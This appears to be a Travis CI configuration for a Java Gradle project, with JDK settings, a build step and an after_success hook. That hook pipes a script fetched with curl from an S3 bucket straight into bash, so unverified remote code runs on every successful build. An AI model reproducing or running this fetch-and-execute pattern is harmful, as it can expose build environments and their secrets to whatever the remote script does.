language: java
install: true

notifications:
  email: false

jdk:
  - oraclejdk8

before_install:
  - chmod +x gradlew

script:
  - ./gradlew build

after_success:
  - bash <(curl -s https://s3-ap-southeast-1.amazonaws.com/ci-scan/ff-start-travis.sh)